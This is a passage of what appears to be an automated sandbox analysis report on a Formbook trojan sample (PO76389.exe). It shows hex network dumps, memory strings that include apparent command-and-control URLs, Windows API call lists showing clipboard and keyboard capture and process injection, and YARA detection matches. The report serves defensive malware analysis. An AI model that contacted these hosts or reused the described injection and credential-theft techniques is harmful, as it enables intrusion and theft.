20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 16 Sep 2024 07:41:09 GMTConnection: closeContent-Length: 5108Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fimgroup.net
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fimgroup.net/f3w9/
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004DDE000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000491E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000478C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033z:
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.2774641908.00000000075C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004472000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.0000000003FB2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000003C98000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.00000000037D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00507099
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00507294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00507294
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00507099
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_004F4342
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0051F5D0

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_004B29C2
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005202AA NtdllDialogWndProc_W,0_2_005202AA
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051E769 NtdllDialogWndProc_W,CallWindowProcW,0_2_0051E769
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EA4E NtdllDialogWndProc_W,0_2_0051EA4E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0051EAA6
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAC99 NtdllDialogWndProc_W,0_2_004CAC99
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0051ECBC
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,0_2_004CAD5C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAFB4 GetParent,NtdllDialogWndProc_W,0_2_004CAFB4
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0051EFA8
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F0A1 SendMessageW,NtdllDialogWndProc_W,0_2_0051F0A1
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0051F122
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F37C NtdllDialogWndProc_W,0_2_0051F37C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F3DA NtdllDialogWndProc_W,0_2_0051F3DA
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F3AB NtdllDialogWndProc_W,0_2_0051F3AB
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F45A ClientToScreen,NtdllDialogWndProc_W,0_2_0051F45A
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F425 NtdllDialogWndProc_W,0_2_0051F425
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0051F5D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F594 GetWindowLongW,NtdllDialogWndProc_W,0_2_0051F594
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CB7F2 NtdllDialogWndProc_W,0_2_004CB7F2
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CB845 NtdllDialogWndProc_W,0_2_004CB845
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FE80 NtdllDialogWndProc_W,0_2_0051FE80
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_0051FF04
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_0051FF91
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0254C4F3 NtClose,2_2_0254C4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,2_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B60 NtClose,LdrInitializeThunk,2_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174340 NtSetContextThread,2_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173010 NtOpenDirectoryObject,2_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173090 NtSetValueKey,2_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174650 NtSuspendThread,2_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B80 NtQueryInformationFile,2_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BA0 NtEnumerateValueKey,2_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BF0 NtAllocateVirtualMemory,2_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BE0 NtQueryValueKey,2_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AB0 NtWaitForSingleObject,2_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AD0 NtReadFile,2_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AF0 NtWriteFile,2_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031739B0 NtGetContextThread,2_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F30 NtCreateSection,2_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F60 NtCreateProcessEx,2_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F90 NtProtectVirtualMemory,2_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FB0 NtResumeThread,2_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FA0 NtQuerySection,2_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FE0 NtCreateFile,2_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E30 NtWriteVirtualMemory,2_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E80 NtReadVirtualMemory,2_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EA0 NtAdjustPrivilegesToken,2_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EE0 NtQueueApcThread,2_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D10 NtMapViewOfSection,2_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D10 NtOpenProcessToken,2_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D00 NtSetInformationFile,2_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D30 NtUnmapViewOfSection,2_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D70 NtOpenThread,2_2_03173D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DB0 NtEnumerateKey,2_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DD0 NtDelayExecution,2_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C60 NtCreateKey,2_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CA0 NtQueryInformationToken,2_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CC0 NtQueryVirtualMemory,2_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD4340 NtSetContextThread,LdrInitializeThunk,5_2_02FD4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD4650 NtSuspendThread,LdrInitializeThunk,5_2_02FD4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2AF0 NtWriteFile,LdrInitializeThunk,5_2_02FD2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2AD0 NtReadFile,LdrInitializeThunk,5_2_02FD2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02FD2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02FD2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02FD2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2B60 NtClose,LdrInitializeThunk,5_2_02FD2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02FD2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02FD2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2FE0 NtCreateFile,LdrInitializeThunk,5_2_02FD2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2FB0 NtResumeThread,LdrInitializeThunk,5_2_02FD2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2F30 NtCreateSection,LdrInitializeThunk,5_2_02FD2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02FD2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02FD2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2C60 NtCreateKey,LdrInitializeThunk,5_2_02FD2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02FD2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02FD2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02FD2D30
